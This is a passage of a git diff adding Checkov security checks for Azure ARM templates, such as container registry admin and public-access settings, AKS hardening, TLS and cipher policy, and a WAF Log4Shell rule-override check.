+  - cond_type: "attribute"
+    resource_types: "Microsoft.MachineLearningServices/workspaces"
+    attribute: "properties.publicNetworkAccess"
+    operator: "equals"
+    value: "Disabled"
\ No newline at end of file
diff --git a/checkov/arm/checks/resource/ACRAdminAccountDisabled.py b/checkov/arm/checks/resource/ACRAdminAccountDisabled.py
new file mode 100644
index 00000000000..1235c707553
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRAdminAccountDisabled.py
@@ -0,0 +1,22 @@
+from __future__ import annotations
+from typing import Any, List
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class ACRAdminAccountDisabled(BaseResourceNegativeValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure ACR admin account is disabled"
+        id = "CKV_AZURE_137"
+        supported_resources = ("Microsoft.ContainerRegistry/registries",)
+        categories = [CheckCategories.IAM]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/adminUserEnabled"
+
+    def get_forbidden_values(self) -> List[Any]:
+        return [True]
+
+
+check = ACRAdminAccountDisabled()
diff --git a/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py b/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py
new file mode 100644
index 00000000000..812a084160c
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py
@@ -0,0 +1,38 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class ACRAnonymousPullDisabled(BaseResourceCheck):
+    ANONYMOUS_PULL_SKUS = {"Standard", "Premium"}  # noqa: CCE003  # a static attribute
+
+    def __init__(self) -> None:
+        name = "Ensures that ACR disables anonymous pulling of images"
+        id = "CKV_AZURE_138"
+        supported_resources = ("Microsoft.ContainerRegistry/registries",)
+        categories = (CheckCategories.IAM,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties", {})
+
+        anonymousPullEnabled = properties.get("anonymousPullEnabled")
+
+        sku = conf.get("sku")
+
+        if (
+                sku is not None
+                and isinstance(sku.get("name"), str)
+                and sku.get("name") in ACRAnonymousPullDisabled.ANONYMOUS_PULL_SKUS
+                and properties
+                and anonymousPullEnabled
+        ):
+            return CheckResult.FAILED
+
+        return CheckResult.PASSED
+
+
+check = ACRAnonymousPullDisabled()
diff --git a/checkov/arm/checks/resource/ACRContainerScanEnabled.py b/checkov/arm/checks/resource/ACRContainerScanEnabled.py
new file mode 100644
index 00000000000..f588818dc4d
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRContainerScanEnabled.py
@@ -0,0 +1,28 @@
+
+from __future__ import annotations
+from typing import Any, Dict
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class ACRContainerScanEnabled(BaseResourceCheck):
+    SKUS = {"Standard", "Premium"}  # noqa: CCE003  # a static attribute
+
+    def __init__(self) -> None:
+        name = "Enable vulnerability scanning for container images."
+        id = "CKV_AZURE_163"
+        supported_resources = ("Microsoft.ContainerRegistry/registries",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        sku = conf.get("sku", {})
+        sku_name = sku.get("name")
+
+        if isinstance(sku_name, str) and sku_name in ACRContainerScanEnabled.SKUS:
+            return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = ACRContainerScanEnabled()
diff --git a/checkov/arm/checks/resource/ACREnableImageQuarantine.py b/checkov/arm/checks/resource/ACREnableImageQuarantine.py
new file mode 100644
index 00000000000..3b3fe5dca45
--- /dev/null
+++ b/checkov/arm/checks/resource/ACREnableImageQuarantine.py
@@ -0,0 +1,21 @@
+from __future__ import annotations
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class ACREnableImageQuarantine(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure container image quarantine, scan, and mark images verified"
+        id = "CKV_AZURE_166"
+        supported_resources = ("Microsoft.ContainerRegistry/registries",)
+        categories = (CheckCategories.SUPPLY_CHAIN,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/policies/quarantinePolicy/status"
+
+    def get_expected_value(self) -> str:
+        return "enabled"
+
+
+check = ACREnableImageQuarantine()
diff --git a/checkov/arm/checks/resource/ACREnableZoneRedundancy.py b/checkov/arm/checks/resource/ACREnableZoneRedundancy.py
new file mode 100644
index 00000000000..da146a84344
--- /dev/null
+++ b/checkov/arm/checks/resource/ACREnableZoneRedundancy.py
@@ -0,0 +1,31 @@
+from __future__ import annotations
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+from typing import Any
+
+
+class ACREnableZoneRedundancy(BaseResourceCheck):
+
+    def __init__(self) -> None:
+        """
+        Zone redundancy provides resiliency and high availability to
+        a registry or replication resource in a specific region. Supported on Premium.
+        """
+        name = "Ensure Azure Container Registry (ACR) is zone redundant"
+        id = "CKV_AZURE_233"
+        supported_resources = ("Microsoft.ContainerRegistry/registries", "Microsoft.ContainerRegistry/registries/replications",)
+        categories = (CheckCategories.BACKUP_AND_RECOVERY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult:
+        # check registry. default=false
+        properties = conf.get("properties")
+        if properties and isinstance(properties, dict):
+            if properties.get("zoneRedundancy") == "Disabled":
+                return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = ACREnableZoneRedundancy()
diff --git a/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py b/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py
new file mode 100644
index 00000000000..b2b91e9cfce
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py
@@ -0,0 +1,22 @@
+
+from __future__ import annotations
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class ACRPublicNetworkAccessDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure ACR set to disable public networking"
+        id = "CKV_AZURE_139"
+        supported_resources = ("Microsoft.ContainerRegistry/registries",)
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> str:
+        return "Disabled"
+
+
+check = ACRPublicNetworkAccessDisabled()
diff --git a/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py b/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py
new file mode 100644
index 00000000000..db1c5036b30
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py
@@ -0,0 +1,38 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AKSEncryptionAtHostEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        """
+        With host-based encryption, the data stored on the VM host of
+        your AKS agent nodes' VMs is encrypted at rest and flows encrypted to the Storage service.
+        This means the temp disks are encrypted at rest with platform-managed keys.
+        The cache of OS and data disks is encrypted at rest with either platform-managed keys
+        or customer-managed keys depending on the encryption type set on those disks.
+        """
+        name = "Ensure that the AKS cluster encrypt temp disks, caches, and data flows "
+        name += "between Compute and Storage resources"
+        id = "CKV_AZURE_227"
+        supported_resources = ["Microsoft.ContainerService/managedClusters",
+                               "Microsoft.ContainerService/managedClusters/agentPools"]
+        categories = [CheckCategories.KUBERNETES, ]
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+            missing_block_result=CheckResult.FAILED,
+        )
+
+    def get_inspected_key(self) -> str:
+        if self.entity_type == "Microsoft.ContainerService/managedClusters":
+            return "properties/agentPoolProfiles/[0]/enableEncryptionAtHost"
+        else:
+            return "properties/enableEncryptionAtHost"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = AKSEncryptionAtHostEnabled()
diff --git a/checkov/arm/checks/resource/AKSEphemeralOSDisks.py b/checkov/arm/checks/resource/AKSEphemeralOSDisks.py
new file mode 100644
index 00000000000..92b87553890
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSEphemeralOSDisks.py
@@ -0,0 +1,31 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AKSEphemeralOSDisks(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        """
+        Temporary data can contain sensitive data at some points, by using ephemeral disks,
+        we ensure that data written to OS disk is stored on local VM storage and isn't persisted to Azure Storage
+        Azure automatically replicates data stored in the managed OS disk of a virtual machine to Azure storage
+        to avoid data loss in case the virtual machine needs to be relocated to another host.
+        Generally speaking, containers are not designed to have local state persisted to the managed OS disk,
+        hence this behavior offers limited value to AKS hosted while providing some drawbacks,
+        including slower node provisioning and higher read/write latency.
+        Ephemeral disks allow us also to have faster cluster operations like scale or upgrade
+        due to faster re-imaging and boot times.
+        """
+        name = "Ensure ephemeral disks are used for OS disks"
+        id = "CKV_AZURE_226"
+        supported_resources = ["Microsoft.ContainerService/managedClusters",]
+        categories = [CheckCategories.KUBERNETES,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/agentPoolProfiles/[0]/osDiskType"
+
+    def get_expected_value(self) -> str:
+        return "Ephemeral"
+
+
+check = AKSEphemeralOSDisks()
diff --git a/checkov/arm/checks/resource/AKSLocalAdminDisabled.py b/checkov/arm/checks/resource/AKSLocalAdminDisabled.py
new file mode 100644
index 00000000000..2fa7d5c967b
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSLocalAdminDisabled.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AKSLocalAdminDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure AKS local admin account is disabled"
+        id = "CKV_AZURE_141"
+        supported_resources = ("Microsoft.ContainerService/managedClusters",)
+        categories = (CheckCategories.IAM,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/disableLocalAccounts"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = AKSLocalAdminDisabled()
diff --git a/checkov/arm/checks/resource/AKSMaxPodsMinimum.py b/checkov/arm/checks/resource/AKSMaxPodsMinimum.py
new file mode 100644
index 00000000000..4bf722059a0
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSMaxPodsMinimum.py
@@ -0,0 +1,34 @@
+from __future__ import annotations
+from typing import Any
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+from typing import Optional
+
+
+class AKSMaxPodsMinimum(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods."
+        id = "CKV_AZURE_168"
+        supported_resources = ("Microsoft.ContainerService/managedClusters",
+                               "Microsoft.ContainerService/managedClusters/agentPools", )
+        categories = (CheckCategories.KUBERNETES,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        max_pods: Optional[int] = 30
+
+        properties = conf.get("properties")
+        if properties and isinstance(properties, dict):
+            max_pods = properties.get("maxPods")
+
+        if "agentPoolProfiles" in properties:
+            if "maxPods" in properties["agentPoolProfiles"][0]:
+                max_pods = properties["agentPoolProfiles"][0]["maxPods"]
+
+        if max_pods is None or max_pods < 50:
+            return CheckResult.FAILED
+
+        return CheckResult.PASSED
+
+
+check = AKSMaxPodsMinimum()
diff --git a/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py b/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py
new file mode 100644
index 00000000000..c0074c69708
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py
@@ -0,0 +1,24 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class AKSPoolTypeIsScaleSet(BaseResourceNegativeValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets"
+        id = "CKV_AZURE_169"
+        supported_resources = ("Microsoft.ContainerService/managedClusters",)
+        categories = (CheckCategories.KUBERNETES,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def get_inspected_key(self) -> str:
+        return "properties/agentPoolProfiles/[0]/type"
+
+    def get_forbidden_values(self) -> list[Any]:
+        return ["AvailabilitySet"]
+
+
+check = AKSPoolTypeIsScaleSet()
diff --git a/checkov/arm/checks/resource/AKSUpgradeChannel.py b/checkov/arm/checks/resource/AKSUpgradeChannel.py
new file mode 100644
index 00000000000..f1991478525
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSUpgradeChannel.py
@@ -0,0 +1,30 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class AKSUpgradeChannel(BaseResourceNegativeValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure AKS cluster upgrade channel is chosen"
+        id = "CKV_AZURE_171"
+        supported_resources = ("Microsoft.ContainerService/managedClusters",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+            missing_block_result=CheckResult.FAILED,
+        )
+
+    def get_inspected_key(self) -> str:
+        return "properties/autoUpgradeProfile/upgradeChannel"
+
+    def get_forbidden_values(self) -> Any:
+        return "none"
+
+
+check = AKSUpgradeChannel()
diff --git a/checkov/arm/checks/resource/APIManagementMinTLS12.py b/checkov/arm/checks/resource/APIManagementMinTLS12.py
new file mode 100644
index 00000000000..9813b7f5c7a
--- /dev/null
+++ b/checkov/arm/checks/resource/APIManagementMinTLS12.py
@@ -0,0 +1,35 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class APIManagementMinTLS12(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure API management uses at least TLS 1.2"
+        id = "CKV_AZURE_173"
+        supported_resources = ("Microsoft.ApiManagement/service",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties")
+        if isinstance(properties, dict) and "customProperties" in properties:
+            customProperties = properties.get("customProperties")
+            if isinstance(customProperties, dict):
+                if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Ssl30"):
+                    return CheckResult.FAILED
+                if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Tls10"):
+                    return CheckResult.FAILED
+                if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Ssl30"):
+                    return CheckResult.FAILED
+                if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls10"):
+                    return CheckResult.FAILED
+                if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls11"):
+                    return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = APIManagementMinTLS12()
diff --git a/checkov/arm/checks/resource/APIManagementPublicAccess.py b/checkov/arm/checks/resource/APIManagementPublicAccess.py
new file mode 100644
index 00000000000..5b961416f3c
--- /dev/null
+++ b/checkov/arm/checks/resource/APIManagementPublicAccess.py
@@ -0,0 +1,22 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class APIManagementPublicAccess(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure API management public access is disabled"
+        id = "CKV_AZURE_174"
+        supported_resources = ("Microsoft.ApiManagement/service",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> Any:
+        return "Disabled"
+
+
+check = APIManagementPublicAccess()
diff --git a/checkov/arm/checks/resource/AkSSecretStoreRotation.py b/checkov/arm/checks/resource/AkSSecretStoreRotation.py
new file mode 100644
index 00000000000..4589fd1ee1c
--- /dev/null
+++ b/checkov/arm/checks/resource/AkSSecretStoreRotation.py
@@ -0,0 +1,17 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AkSSecretStoreRotation(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters"
+        id = "CKV_AZURE_172"
+        supported_resources = ("Microsoft.ContainerService/managedClusters",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/addonProfiles/azureKeyvaultSecretsProvider/config/enableSecretRotation"
+
+
+check = AkSSecretStoreRotation()
diff --git a/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py
new file mode 100644
index 00000000000..a8003bb59d8
--- /dev/null
+++ b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py
@@ -0,0 +1,71 @@
+from __future__ import annotations
+from typing import Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+BAD_CIPHERS = {
+    "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384",
+    "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256",
+    "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
+    "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
+    "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384",
+    "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",
+    "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
+    "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
+    "TLS_RSA_WITH_AES_256_GCM_SHA384",
+    "TLS_RSA_WITH_AES_128_GCM_SHA256",
+    "TLS_RSA_WITH_AES_256_CBC_SHA256",
+    "TLS_RSA_WITH_AES_128_CBC_SHA256",
+    "TLS_RSA_WITH_AES_256_CBC_SHA",
+    "TLS_RSA_WITH_AES_128_CBC_SHA",
+    "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 ",
+    "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256",
+    "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
+    "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
+    "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256",
+    "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 ",
+    "TLS_DHE_DSS_WITH_AES_256_CBC_SHA",
+    "TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
+    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
+    "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA",
+}
+PROTOCOL_VERSIONS = {"TLSv1_2", "TLSv1_3"}
+
+
+class AppGWDefinesSecureProtocols(BaseResourceCheck):
+    def __init__(self) -> None:
+        """
+        https://azure.github.io/PSRule.Rules.Azure/en/rules/Azure.AppGw.SSLPolicy/
+        """
+        name = "Ensure Application Gateway defines secure protocols for in transit communication"
+        id = "CKV_AZURE_218"
+        supported_resources = ("Microsoft.Network/applicationGateways",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name,
+                         id=id,
+                         categories=categories,
+                         supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        sslPolicy = conf["properties"].get("sslPolicy")
+        if sslPolicy and isinstance(sslPolicy, dict):
+            policyType = sslPolicy.get("policyType")
+            if policyType != "Predefined":
+                protocolversion = sslPolicy.get("minProtocolVersion")
+                if (
+                        protocolversion and isinstance(protocolversion, str)
+                        and protocolversion in PROTOCOL_VERSIONS
+                ):
+                    ciphers = sslPolicy.get("cipherSuites")
+                    if ciphers and isinstance(ciphers, list) and any(cipher in BAD_CIPHERS for cipher in ciphers):
+                        return CheckResult.FAILED
+                    return CheckResult.PASSED
+
+            policyName = sslPolicy.get("policyName")
+            if policyName == "AppGwSslPolicy20220101S":
+                return CheckResult.PASSED
+            return CheckResult.FAILED
+        return CheckResult.FAILED
+
+
+check = AppGWDefinesSecureProtocols()
diff --git a/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py b/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py
new file mode 100644
index 00000000000..71e3cc02a56
--- /dev/null
+++ b/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py
@@ -0,0 +1,53 @@
+from typing import Dict, Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.util.type_forcers import force_list
+
+
+class AppGatewayWAFACLCVE202144228(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell"
+        id = "CKV_AZURE_135"
+        supported_resources = ("Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",)
+        categories = (CheckCategories.APPLICATION_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties")
+        if not properties:
+            return CheckResult.FAILED
+        self.evaluated_keys = properties.get("managedRules")
+        managed_rules = properties.get("managedRules")
+        if managed_rules:
+            managed_rule_sets = managed_rules.get("managedRuleSets") or []
+            for idx_rule_set, rule_set in enumerate(force_list(managed_rule_sets)):
+                self.evaluated_keys = [
+                    f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleSetType",
+                    f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleSetVersion",
+                ]
+                if (rule_set.get("ruleSetType") == "OWASP" or not rule_set.get("ruleSetType")) and rule_set.get("ruleSetVersion") in ["3.1", "3.2"]:
+                    rule_overrides = rule_set.get("ruleGroupOverrides") or []
+                    for idx_override, rule_override in enumerate(force_list(rule_overrides)):
+                        self.evaluated_keys.extend(
+                            [
+                                f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleGroupOverrides/[{idx_override}]/ruleGroupName",
+                                f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleGroupOverrides/[{idx_override}]/rules",
+                            ]
+                        )
+                        if isinstance(rule_override, dict) and rule_override.get("ruleGroupName") == "REQUEST-944-APPLICATION-ATTACK-JAVA":
+                            disabled_rules = rule_override.get("rules") or []
+                            for idx_rule_id, disabled_rule in enumerate(force_list(disabled_rules)):
+                                self.evaluated_keys.extend(
+                                    [
+                                        f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule_id}]/ruleId",
+                                    ]
+                                )
+                                if disabled_rule.get("ruleId") == "944240":
+                                    return CheckResult.FAILED
+
+                    return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = AppGatewayWAFACLCVE202144228()
diff --git a/checkov/arm/checks/resource/AppServiceDisallowCORS.py b/checkov/arm/checks/resource/AppServiceDisallowCORS.py
new file mode 100644
index 00000000000..1a38ca3b287
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceDisallowCORS.py
@@ -0,0 +1,28 @@
+from typing import Any, List
+
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServiceDisallowCORS(BaseResourceNegativeValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that CORS disallows every resource to access app services"
+        id = "CKV_AZURE_57"
+        supported_resources = ("Microsoft.Web/sites",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+            missing_block_result=CheckResult.PASSED
+        )
+
+    def get_inspected_key(self) -> str:
+        return 'properties/siteConfig/cors/allowedOrigins'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return ['*']
+
+
+check = AppServiceDisallowCORS()
diff --git a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py
index 7cce9eae3f5..415d32c6ac9 100644
--- a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py
+++ b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py
@@ -14,7 +14,7 @@ def get_inspected_key(self) -> str:
         return "properties/netFrameworkVersion"
 
     def get_expected_value(self) -> str:
-        return "v7.0"
+        return "v8.0"
 
 
 check = AppServiceDotnetFrameworkVersion()
diff --git a/checkov/arm/checks/resource/AppServiceFTPSState.py b/checkov/arm/checks/resource/AppServiceFTPSState.py
new file mode 100644
index 00000000000..5c20ed0bab0
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceFTPSState.py
@@ -0,0 +1,25 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from typing import List
+from typing import Any
+
+
+class AppServiceFTPSState(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure FTP deployments are disabled"
+        id = "CKV_AZURE_78"
+        supported_resources = ('Microsoft.Web/sites',)
+        categories = (CheckCategories.APPLICATION_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/ftpsState"
+
+    def get_expected_value(self) -> Any:
+        return "Disabled"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["Disabled", "FtpsOnly"]
+
+
+check = AppServiceFTPSState()
diff --git a/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py
new file mode 100644
index 00000000000..ce0540ad8f7
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py
@@ -0,0 +1,22 @@
+from typing import Any
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServiceIdentityProviderEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Managed identity provider is enabled for web apps"
+        id = "CKV_AZURE_71"
+        supported_resources = ('Microsoft.Web/sites',)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "identity/type"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = AppServiceIdentityProviderEnabled()
diff --git a/checkov/arm/checks/resource/AppServiceInstanceMinimum.py b/checkov/arm/checks/resource/AppServiceInstanceMinimum.py
new file mode 100644
index 00000000000..5954c70fc95
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceInstanceMinimum.py
@@ -0,0 +1,34 @@
+from __future__ import annotations
+
+from typing import Dict
+
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServiceInstanceMinimum(BaseResourceCheck):
+    def __init__(self) -> None:
+        # "App Services Plans provides a configurable number of instances that will run apps.
+        # When a single instance is configured your app may be temporarily unavailable during unplanned interruptions.
+        # In most circumstances, Azure will self-heal faulty app service instances automatically.
+        # How-ever during this time there may interruptions to your workload."
+        name = "Ensure App Service has a minimum number of instances for failover"
+        id = "CKV_AZURE_212"
+        supported_resources = ("Microsoft.Web/sites", "Microsoft.Web/sites/slots")
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Dict[str, Dict[str, int]]]) -> CheckResult:
+        if "properties" in conf:
+            if conf.get("properties", {}).get("siteConfig") is not None:
+                if "numberOfWorkers" in conf["properties"]["siteConfig"]:
+                    worker_count = conf["properties"]["siteConfig"]["numberOfWorkers"]
+                    if worker_count:
+                        if not isinstance(worker_count, int):
+                            return CheckResult.UNKNOWN
+                        if worker_count > 1:
+                            return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = AppServiceInstanceMinimum()
diff --git a/checkov/arm/checks/resource/AppServiceJavaVersion.py b/checkov/arm/checks/resource/AppServiceJavaVersion.py
new file mode 100644
index 00000000000..759c6fa197b
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceJavaVersion.py
@@ -0,0 +1,22 @@
+from typing import Any
